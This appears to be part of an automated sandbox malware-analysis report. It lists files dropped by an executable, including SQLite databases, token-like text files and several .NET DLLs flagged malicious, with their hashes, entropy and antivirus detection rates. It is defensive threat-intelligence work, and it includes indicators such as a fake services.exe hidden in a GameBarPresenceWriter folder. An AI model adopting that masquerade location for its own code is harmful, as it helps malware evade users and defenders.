                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):49152
                                                                                                                              Entropy (8bit):0.8180424350137764
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                              Malicious:false
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                              Category:modified
                                                                                                                              Size (bytes):5242880
                                                                                                                              Entropy (8bit):0.037963276276857943
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                              MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                              SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                              SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                              SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                              Malicious:false
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):40960
                                                                                                                              Entropy (8bit):0.8553638852307782
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                              Malicious:false
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):98304
                                                                                                                              Entropy (8bit):0.08235737944063153
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                              Malicious:false
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):114688
                                                                                                                              Entropy (8bit):0.9746603542602881
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                              Malicious:false
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):40960
                                                                                                                              Entropy (8bit):0.8553638852307782
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                              Malicious:false
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:JSON data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):14
                                                                                                                              Entropy (8bit):3.378783493486176
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Y2Qt6eYYn:Y2Qt6eYYn
                                                                                                                              MD5:6CA4960355E4951C72AA5F6364E459D5
                                                                                                                              SHA1:2FD90B4EC32804DFF7A41B6E63C8B0A40B592113
                                                                                                                              SHA-256:88301F0B7E96132A2699A8BCE47D120855C7F0A37054540019E3204D6BCBABA3
                                                                                                                              SHA-512:8544CD778717788B7484FAF2001F463320A357DB63CB72715C1395EF19D32EEC4278BAB07F15DE3F4FED6AF7E4F96C41908A0C45BE94D5CDD8121877ECCF310D
                                                                                                                              Malicious:false
                                                                                                                              Preview:{"Surveys":{}}
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):159744
                                                                                                                              Entropy (8bit):0.7873599747470391
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                              MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                              SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                              SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                              SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                              Malicious:false
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):126976
                                                                                                                              Entropy (8bit):0.47147045728725767
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                              MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                              SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                              SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                              SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                              Malicious:false
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):25
                                                                                                                              Entropy (8bit):4.293660689688185
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:xrn26tGqUIg:tn26tGz
                                                                                                                              MD5:8596D21E3D9F915C6B369DB324B66BA1
                                                                                                                              SHA1:4FFF5D38B29770048274A895A60527AEDC71A36C
                                                                                                                              SHA-256:F0D3A272F34C9116B5C0580C2B38A4AC12682605D0D06F9CE22C20DD2D8611D8
                                                                                                                              SHA-512:12637CD0BBCD27A68DE1724FB7FA31347F02294ADAB11570FDE87031627190DD3688794CAD168001514B7DD8022A5E7A8D640283F71323EC0F26E9CCE0D02901
                                                                                                                              Malicious:false
                                                                                                                              Preview:nSWNsTopAoEBk0HcOE4meToDw
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):20480
                                                                                                                              Entropy (8bit):0.5707520969659783
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                              Malicious:false
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):25
                                                                                                                              Entropy (8bit):4.163856189774724
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:5d82n:Ln
                                                                                                                              MD5:02259ED05CEAF2B4DE9DE5614EF0FB1C
                                                                                                                              SHA1:62BD3DEE56FEB97B5F8764AD8DF1005F11CD4E19
                                                                                                                              SHA-256:58E0AD63479DEC6801CACA1A09D59F52A4B8F8D841568631CF4EE911D1158831
                                                                                                                              SHA-512:DA2E4162E987E48258DC5B8DF941F0EDB209265D50CBD3DE56EF153712A0C299B855C34E17E213910215D2BCFB690274FC35362A6B671759A6D9DEEDBB5A1DFE
                                                                                                                              Malicious:false
                                                                                                                              Preview:nyH371oQSK7zfoIBlcxTiyzQS
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):20480
                                                                                                                              Entropy (8bit):0.5712781801655107
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                              Malicious:false
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):32256
                                                                                                                              Entropy (8bit):5.631194486392901
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                              MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                              SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                              SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                              SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                              Joe Sandbox View:
                                                                                                                              • Filename: 67VB5TS184.exe, Detection: malicious
                                                                                                                              • Filename: 4t8f8F3uT1.exe, Detection: malicious
                                                                                                                              • Filename: F3ePjP272h.exe, Detection: malicious
                                                                                                                              • Filename: cbCjTbodwa.exe, Detection: malicious
                                                                                                                              • Filename: vb8DOBZQ4X.exe, Detection: malicious
                                                                                                                              • Filename: 6G8OR42xrB.exe, Detection: malicious
                                                                                                                              • Filename: XNPOazHpXF.exe, Detection: malicious
                                                                                                                              • Filename: 9FwQYJSj4N.exe, Detection: malicious
                                                                                                                              • Filename: 8k1e14tjcx.exe, Detection: malicious
                                                                                                                              • Filename: gkcQYEdJSO.exe, Detection: malicious
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):38912
                                                                                                                              Entropy (8bit):5.679286635687991
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                                                              MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                                                              SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                                                              SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                                                              SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):85504
                                                                                                                              Entropy (8bit):5.8769270258874755
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                              MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                              SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                              SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                              SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):294912
                                                                                                                              Entropy (8bit):6.010605469502259
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                                                              MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                                                              SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                                                              SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                                                              SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):126976
                                                                                                                              Entropy (8bit):6.057993947082715
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                                                                              MD5:16B480082780CC1D8C23FB05468F64E7
                                                                                                                              SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                                                                              SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                                                                              SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):294912
                                                                                                                              Entropy (8bit):6.010605469502259
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                                                              MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                                                              SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                                                              SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                                                              SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):36352
                                                                                                                              Entropy (8bit):5.668291349855899
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                                                                              MD5:94DA5073CCC14DCF4766DF6781485937
                                                                                                                              SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                                                                              SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                                                                              SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):50176
                                                                                                                              Entropy (8bit):5.723168999026349
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                                                              MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                                                              SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                                                              SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                                                              SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):342528
                                                                                                                              Entropy (8bit):6.170134230759619
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                                                              MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                                                              SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                                                              SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                                                              SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):69632
                                                                                                                              Entropy (8bit):5.932541123129161
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                              MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                              SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                              SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                              SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):85504
                                                                                                                              Entropy (8bit):5.8769270258874755
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                              MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                              SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                              SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                              SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):41472
                                                                                                                              Entropy (8bit):5.6808219961645605
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                                                                              MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                                                                              SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                                                                              SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                                                                              SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):33792
                                                                                                                              Entropy (8bit):5.541771649974822
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                                              MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                                              SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                                              SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                                              SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):50176
                                                                                                                              Entropy (8bit):5.723168999026349
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                                                              MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                                                              SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                                                              SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
